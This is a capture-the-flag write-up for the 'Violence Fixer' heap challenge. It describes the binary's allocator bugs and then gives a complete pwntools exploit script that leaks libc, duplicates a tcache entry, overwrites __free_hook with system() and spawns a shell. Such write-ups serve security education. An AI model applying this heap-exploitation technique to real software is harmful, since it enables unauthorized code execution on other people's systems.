Rating:
# Violence Fixer
## Abstraction  
This binary is a really simplified heap management system. It tries to manage chunks in a heap without libc heap management system, but it collapses easily by free().  
  
## Bugs  
When you free a small chunk right before top, it would be connected to tcache. However, this system misrecognize that this chunks would be consolidated with top. In addition to it, when you free a chunk in the middle of heap, this system also collapses and just substructs the size of the freed chunk from top.  So there are so much vulnerability to pwn easily.  
## Rough Overview of Exploit  
You can easily leak the libcbase by reading the content of a freed unsorted chunk. And this system allows you to use an original heap management system only once in delegate(). So, you can use it to overwrite \_\_free\_hook into system().  
## Exploit
```python
#!/usr/bin/env python
#encoding: utf-8;
from pwn import *
import sys
import time
FILENAME = "../dist/violence-fixer"
LIBCNAME = "../dist/libc.so.6"
hosts = ("test","localhost","localhost")
ports = (32112,12300,32112)
rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost 
rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
context(os='linux',arch='amd64')
binf = ELF(FILENAME)
libc = ELF(LIBCNAME) if LIBCNAME!="" else None
## utilities #########################################
def hoge(ix):
  c.recvuntil("> ")
  c.sendline(str(ix))
def alloc(size,content):
  hoge(1)
  c.recvuntil("size: ")
  c.sendline(str(size))
  c.recvuntil("content: ")
  c.send(content)
def show(index):
  hoge(2)
  c.recvuntil("index: ")
  c.sendline(str(index))
def free(index):
  hoge(3)
  c.recvuntil("index: ")
  c.sendline(str(index))
def get_value(index):
  hoge(4)
  for i in range(index):
    c.recvuntil("INUSE")
  c.recvuntil("INUSE\n ")
  return c.recv(8)
def delegate(size,content):
  hoge(0)
  c.recvuntil("> ")
  c.sendline('y')
  c.recvuntil("size: ")
  c.sendline(str(size))
  c.recvuntil("content: ")
  c.send(content)
## exploit ###########################################
def exploit():
  global c
  c.recvuntil("?: ")
  c.sendline("y")
  # prepare
  alloc(0x200,"1"*0x30)
  alloc(0x200,"2"*0x30)
  alloc(0x200,"3"*0x30)
  alloc(0x200,"4"*0x30)
  alloc(0xa0,"5"*0x30)
  alloc(0x200,"4"*0x30)
  alloc(0x1e0,"4"*0x30)
  alloc(0x1e0,"4"*0x30) # TARGET
  alloc(0x1e0,"5"*0x30)
  alloc(0x1e0,p64(0x21)*(0x1e0//8))
  alloc(0x1e0,"7"*0x10)
  alloc(0xc0,"8"*0x10)
  alloc(0x10,"9"*0x10)
  # leak libcbase
  free(1)
  free(2)
  free(3)
  free(4)
  free(5)
  alloc(0x60,p8(0)*0x30 + p64(0) + p64(0x481))
  free(7)
  for i in range(4):
    alloc(0x10,p8(1))
  alloc(0x160,"A"*0x160)
  show(7)
  c.recvuntil("A"*0x160)
  libcbase = unpack(c.recvline().rstrip().ljust(8,'\x00')) - 0x1ebbe0
  print("[+]libcbase: "+hex(libcbase))
  # tcache duplicate
  alloc(0x1f0,p8(0))
  alloc(0x80,p8(0)) 
  alloc(0x60,"1"*0x8) # At this point, exeeds a real top
  alloc(0x50,"/bin/sh;\x00")
  alloc(0x50,"3"*0x8)
  alloc(0x20,"4"*0x8)
  alloc(0x20,"5"*0x8)
  alloc(0x20,"6"*0x8)
  alloc(0x20,"7"*0x8) # 
  free(0xf)
  free(0x13)
  free(0x15)
  alloc(0x130,p64(0)+p64(0x31)+"A"*0x80+p64(0)+p64(0x31)+p64(libcbase + libc.symbols["__free_hook"]))
  alloc(0x20,p8(0))
  delegate(0x20,p64(libcbase+libc.symbols["system"]))
  free(0x10)
  return
## main ##############################################
if __name__ == "__main__":
    global c
    start_time = time.time()
    
    if len(sys.argv)>1:
      if sys.argv[1][0]=="d":
        cmd = """
          set follow-fork-mode parent
        """
        c = gdb.debug(FILENAME,cmd)
      elif sys.argv[1][0]=="r":
        c = remote(rhp1["host"],rhp1["port"])
      elif sys.argv[1][0]=="v":
        c = remote(rhp3["host"],rhp3["port"])
    else:
        c = remote(rhp2['host'],rhp2['port'])
    exploit()
    print("\n\n[!] exploit success: {} sec\n\n".format(time.time()-start_time))
    c.interactive()
```